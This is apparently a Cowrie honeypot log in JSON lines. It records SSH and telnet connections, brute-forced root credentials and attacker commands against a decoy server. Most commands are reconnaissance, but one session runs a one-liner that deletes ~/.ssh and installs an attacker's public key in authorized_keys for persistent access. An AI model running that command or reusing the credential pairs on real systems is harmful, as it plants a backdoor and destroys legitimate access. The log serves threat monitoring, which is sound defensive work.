{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:04:24.208252Z","src_ip":"212.227.235.229","session":"e9b3ec4cbd8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:24.600283Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T19:04:24.601147Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:24.839883Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:25.367131Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T19:04:25.367903Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:25.370390Z","src_ip":"212.227.235.229","session":"4eb218cca8c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:25.604981Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:26.098027Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T19:04:26.098758Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:26.335507Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:26.909740Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T19:04:26.910450Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:27.147201Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:27.638613Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T19:04:27.639384Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:27.876529Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:27.900231Z","src_ip":"212.227.235.229","session":"e9b3ec4cbd8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:04:28.450838Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T19:04:28.451589Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:28.689037Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.closed","duration":"23.5","message":"Connection lost after 23.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:04:28.690559Z","src_ip":"212.227.235.229","session":"e49228f3ef71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41495,"dst_ip":"1.2.3.4","dst_port":22,"session":"472751e78904","protocol":"ssh","message":"New connection: 212.227.235.229:41495 (1.2.3.4:22) [session: 472751e78904]","sensor":"my-vps","timestamp":"2025-08-26T19:05:13.506962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:05:13.507998Z","src_ip":"212.227.235.229","session":"472751e78904"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:05:13.978940Z","src_ip":"212.227.235.229","session":"472751e78904"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48935,"dst_ip":"1.2.3.4","dst_port":23,"session":"204c13379564","protocol":"telnet","message":"New connection: 212.227.125.160:48935 (1.2.3.4:23) [session: 204c13379564]","sensor":"my-vps","timestamp":"2025-08-26T19:05:21.496606Z"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:24.769411Z","src_ip":"212.227.235.229","session":"472751e78904"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60831,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba64d54de4c0","protocol":"ssh","message":"New connection: 212.227.235.229:60831 (1.2.3.4:22) [session: ba64d54de4c0]","sensor":"my-vps","timestamp":"2025-08-26T19:05:36.428329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:05:36.433677Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:05:36.683160Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx`","message":"login attempt [root/1qaz2wsx`] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:05:37.687359Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:05:38.259261Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:05:38.259949Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:05:38.261020Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:38.515360Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:05:39.037899Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:05:39.038713Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:05:39.293440Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:39.294539Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":16785,"dst_ip":"1.2.3.4","dst_port":22,"session":"05e6943d0d1a","protocol":"ssh","message":"New connection: 213.108.243.7:16785 (1.2.3.4:22) [session: 05e6943d0d1a]","sensor":"my-vps","timestamp":"2025-08-26T19:05:39.440900Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33217,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f95c6bf008a","protocol":"ssh","message":"New connection: 212.227.235.229:33217 (1.2.3.4:22) [session: 7f95c6bf008a]","sensor":"my-vps","timestamp":"2025-08-26T19:05:39.564502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:05:39.573971Z","src_ip":"212.227.235.229","session":"7f95c6bf008a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:05:39.841274Z","src_ip":"212.227.235.229","session":"7f95c6bf008a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:05:40.912028Z","src_ip":"212.227.235.229","session":"7f95c6bf008a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:05:41.906622Z","src_ip":"213.108.243.7","session":"05e6943d0d1a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:05:41.907363Z","src_ip":"213.108.243.7","session":"05e6943d0d1a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:42.181677Z","src_ip":"212.227.235.229","session":"7f95c6bf008a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33784,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd5e8244b0aa","protocol":"ssh","message":"New connection: 212.227.235.229:33784 (1.2.3.4:22) [session: fd5e8244b0aa]","sensor":"my-vps","timestamp":"2025-08-26T19:05:42.424341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:05:42.433307Z","src_ip":"212.227.235.229","session":"fd5e8244b0aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:05:42.683903Z","src_ip":"212.227.235.229","session":"fd5e8244b0aa"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:05:43.703703Z","src_ip":"212.227.235.229","session":"fd5e8244b0aa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:43.957224Z","src_ip":"212.227.235.229","session":"fd5e8244b0aa"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:43.959811Z","src_ip":"212.227.235.229","session":"ba64d54de4c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Welkom01","message":"login attempt [root/Welkom01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:05:44.234380Z","src_ip":"213.108.243.7","session":"05e6943d0d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:05:45.026898Z","src_ip":"213.108.243.7","session":"05e6943d0d1a"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T19:05:45.027755Z","src_ip":"213.108.243.7","session":"05e6943d0d1a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:45.388149Z","src_ip":"213.108.243.7","session":"05e6943d0d1a"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:45.535390Z","src_ip":"213.108.243.7","session":"05e6943d0d1a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61400,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1c06a9629c2","protocol":"ssh","message":"New connection: 217.72.205.35:61400 (1.2.3.4:22) [session: e1c06a9629c2]","sensor":"my-vps","timestamp":"2025-08-26T19:05:49.179820Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:49.181573Z","src_ip":"217.72.205.35","session":"e1c06a9629c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45024,"dst_ip":"1.2.3.4","dst_port":23,"session":"8a66a8272e82","protocol":"telnet","message":"New connection: 212.227.125.160:45024 (1.2.3.4:23) [session: 8a66a8272e82]","sensor":"my-vps","timestamp":"2025-08-26T19:05:51.777957Z"}
{"eventid":"cowrie.session.closed","duration":30.551877975463867,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:52.048323Z","src_ip":"212.227.125.160","session":"204c13379564"}
{"eventid":"cowrie.session.closed","duration":1.84495210647583,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:05:53.622836Z","src_ip":"212.227.125.160","session":"8a66a8272e82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51984,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f0c786003fc","protocol":"ssh","message":"New connection: 212.227.235.229:51984 (1.2.3.4:22) [session: 7f0c786003fc]","sensor":"my-vps","timestamp":"2025-08-26T19:06:05.755022Z"}
